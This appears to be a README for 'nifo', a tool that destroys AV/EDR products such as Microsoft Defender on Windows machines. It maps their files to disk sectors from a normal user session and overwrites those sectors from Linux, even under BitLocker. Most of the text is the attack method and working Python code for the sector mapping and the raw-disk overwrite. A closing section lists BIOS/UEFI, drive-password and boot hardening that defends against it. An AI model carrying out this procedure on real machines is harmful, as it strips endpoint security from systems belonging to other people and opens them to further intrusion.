NIFO: remove AV/EDR with physical access
Nuke It From Orbit
With the precision of a brain surgeon wielding a chainsaw, nifo can obliterate most AV/EDR products from endpoints or servers running the world's most popular operating system, even when the system drive is BitLocker-protected. It needs only two things: an unprivileged user session on the target Windows box (to map the product's files to disk sectors) and physical access to a device without proper BIOS/UEFI hardening (the settings that prevent this are listed at the end of this document).
How does it work?
Security on Windows is an afterthought: the operating system boots and runs perfectly well with no AV/EDR installed, and the boot process does not require those components to load. So if you want to disable AV/EDR, it is just a question of breaking it badly enough that it never starts.
The product's own self-protection may stop you from tampering with its registry keys or files from inside the running OS, so nifo takes the direct approach and overwrites the first bytes of the target files while Windows is not running, either by booting Linux from a USB stick or by pulling the drive and attaching it to another machine to make the same modifications.
By identifying the physical sector locations of the essential AV/EDR executables and drivers, we can overwrite exactly those sectors from outside Windows, where none of its protections apply. Whether the drive is BitLocker-protected makes no difference: the goal is not to write anything in particular, only to corrupt the files enough that they fail to load at boot, and overwriting encrypted sectors with garbage simply decrypts to garbage. BitLocker provides confidentiality, not integrity, so nothing flags the corrupted sectors and Windows boots as usual, minus its AV/EDR. Nifty, I might say.
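Both halves of the procedure described above, as an added worked example that is not nifo's own code: on Windows, as a normal user, map the first bytes of a target file to absolute disk sectors (LBAs) with FSCTL_GET_RETRIEVAL_POINTERS plus the volume's cluster size and partition offset; later, from Linux, overwrite exactly those LBAs on the raw device. The IOCTL codes and structure layouts are the documented Windows ones; that handles opened with no or FILE_READ_ATTRIBUTES access are enough for an unprivileged user is an assumption made here, as are 512-byte logical sectors and a volume on a single disk extent. `demo_offline_zap` runs the offline half against a constructed image file instead of a real disk.

```python
"""Added example (not nifo's own code). Windows half: map a file's first bytes to LBAs via
FSCTL_GET_RETRIEVAL_POINTERS + cluster size + partition offset, as a normal user (assumed
sufficient). Offline half: overwrite those LBAs on the raw device. Assumes 512-byte sectors,
NTFS on one disk extent, and a non-resident (bigger than its MFT record) target file."""
import os
import struct
import tempfile

FSCTL_GET_RETRIEVAL_POINTERS = 0x00090073        # CTL_CODE values from winioctl.h
FSCTL_GET_NTFS_VOLUME_DATA = 0x00090064
IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS = 0x00560000
ERROR_MORE_DATA = 234
SECTOR = 512


def parse_retrieval_pointers(buf):
    """RETRIEVAL_POINTERS_BUFFER (DWORD ExtentCount, 4 pad, StartingVcn, {NextVcn, Lcn}...) -> ([(lcn, n)], next_vcn)."""
    count, vcn = struct.unpack_from("<I", buf, 0)[0], struct.unpack_from("<q", buf, 8)[0]
    extents = []
    for i in range(count):
        next_vcn, lcn = struct.unpack_from("<qq", buf, 16 + 16 * i)
        extents.append((lcn, next_vcn - vcn))      # lcn == -1 marks a sparse/unallocated run
        vcn = next_vcn
    return extents, vcn


def first_bytes_to_sectors(extents, cluster_bytes, partition_offset, nbytes, sector=SECTOR):
    """Absolute LBAs on the physical disk that hold the first nbytes of the file."""
    spc, remaining, lbas = cluster_bytes // sector, -(-nbytes // sector), []
    for lcn, nclusters in extents:
        if lcn < 0:
            raise ValueError("sparse run: no fixed sectors to hit")
        base, take = partition_offset // sector + lcn * spc, min(remaining, nclusters * spc)
        lbas.extend(range(base, base + take))
        remaining -= take
        if remaining == 0:
            break
    return lbas


def corrupt_sectors(device, lbas, fill=b"\x00", sector=SECTOR):
    """Overwrite whole sectors in place on a raw device (/dev/sda as root from a live USB) or an image."""
    pattern = (fill * sector)[:sector]
    with open(device, "r+b") as dev:
        for lba in lbas:
            dev.seek(lba * sector)
            dev.write(pattern)
    return len(lbas)


def map_file_windows(path, nbytes=4096):
    """Windows only: LBAs of the first nbytes of path; minimal-rights handles assumed OK for a normal user."""
    import ctypes
    from ctypes import wintypes
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.CreateFileW.restype, k32.CloseHandle.argtypes = wintypes.HANDLE, [wintypes.HANDLE]
    k32.DeviceIoControl.argtypes = [wintypes.HANDLE, wintypes.DWORD, ctypes.c_void_p, wintypes.DWORD,
                                    ctypes.c_void_p, wintypes.DWORD, ctypes.POINTER(wintypes.DWORD), ctypes.c_void_p]
    SHARE_ALL, OPEN_EXISTING, FILE_READ_ATTRIBUTES, BAD = 7, 3, 0x80, ctypes.c_void_p(-1).value

    def ioctl(h, code, inp, outlen):
        out, ret = ctypes.create_string_buffer(outlen), wintypes.DWORD(0)
        ok = k32.DeviceIoControl(h, code, inp, len(inp) if inp else 0, out, outlen, ctypes.byref(ret), None)
        if not ok and ctypes.get_last_error() != ERROR_MORE_DATA:
            raise OSError("DeviceIoControl(%#x) failed: %d" % (code, ctypes.get_last_error()))
        return bool(ok), out.raw                   # ok False here means ERROR_MORE_DATA: call again

    hvol = k32.CreateFileW("\\\\.\\" + path[:2], 0, SHARE_ALL, None, OPEN_EXISTING, 0, None)   # \\.\C:
    hfile = k32.CreateFileW(path, FILE_READ_ATTRIBUTES, SHARE_ALL, None, OPEN_EXISTING, 0, None)
    try:
        if hvol in (None, BAD) or hfile in (None, BAD):
            raise OSError("CreateFileW failed: %d" % ctypes.get_last_error())
        cluster_bytes = struct.unpack_from("<I", ioctl(hvol, FSCTL_GET_NTFS_VOLUME_DATA, None, 96)[1], 44)[0]
        partition_offset = struct.unpack_from("<q", ioctl(hvol, IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS, None, 200)[1], 16)[0]
        extents, vcn = [], 0
        while True:                                # keep asking from the last VCN while ERROR_MORE_DATA
            ok, rp = ioctl(hfile, FSCTL_GET_RETRIEVAL_POINTERS, struct.pack("<q", vcn), 16 + 16 * 512)
            part, vcn = parse_retrieval_pointers(rp)
            extents += part
            if ok:
                return first_bytes_to_sectors(extents, cluster_bytes, partition_offset, nbytes)
    finally:
        for h in (hfile, hvol):
            k32.CloseHandle(h)


# Constructed sample buffer: two runs, VCN 0-1 at LCN 1000 and VCN 2 at LCN 5000.
SAMPLE_RETRIEVAL_BUFFER = struct.pack("<I4xq", 2, 0) + struct.pack("<qqqq", 2, 1000, 3, 5000)


def demo_offline_zap():
    """Dry run on a constructed 64-sector image: file at LCN 2, 4 KiB clusters, partition at LBA 0."""
    with tempfile.TemporaryDirectory() as tmp:
        image = os.path.join(tmp, "disk.img")
        with open(image, "wb") as f:
            f.write(b"A" * SECTOR * 64)
        lbas = first_bytes_to_sectors([(2, 1)], 4096, 0, 1024)          # -> [16, 17]
        written = corrupt_sectors(image, lbas)
        with open(image, "rb") as f:
            data = f.read()
        zapped = all(data[l * SECTOR:(l + 1) * SECTOR] == bytes(SECTOR) for l in lbas)
        intact = data[:16 * SECTOR] == b"A" * 16 * SECTOR and data[18 * SECTOR:] == b"A" * 46 * SECTOR
        return {"lbas": lbas, "written": written, "zapped": zapped, "neighbours_intact": intact}
```

The list of LBAs returned by `map_file_windows` is the only thing that has to travel from the Windows session to the Linux boot; nothing on the drive is ever decrypted. Two wrinkles worth knowing: a file small enough to live inside its MFT record returns no extents at all, and a sparse run reports LCN -1, which the mapping refuses rather than guessing at a sector.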
Supported (LOL) AV/EDR products
- Microsoft Defender
It's easy to plug more products into the code as detectors; pull requests for others are welcome, if you have the paths of the executables and drivers to look for. It's beyond me to do this for every single product out there.
Protecting yourself from this
- Secure BIOS/UEFI settings with a password, so the boot restrictions below cannot simply be switched off again.
- Secure hard drive/SSD data with BitLocker (otherwise the attacker does not even need a Windows session: the NTFS volume can be mounted from Linux and scanned for the sectors, or the files edited directly). BitLocker alone does not stop nifo, since the sector map is collected from inside Windows and garbage written to encrypted sectors is still garbage after decryption.
- Secure the hard drive/SSD from foreign modifications with a hard drive (ATA security) password, so a drive pulled out of the machine stays locked in any other system.
- Disallow booting off anything but the hard drive. On its own this is defeated by removing the drive, which is why the points above matter as well.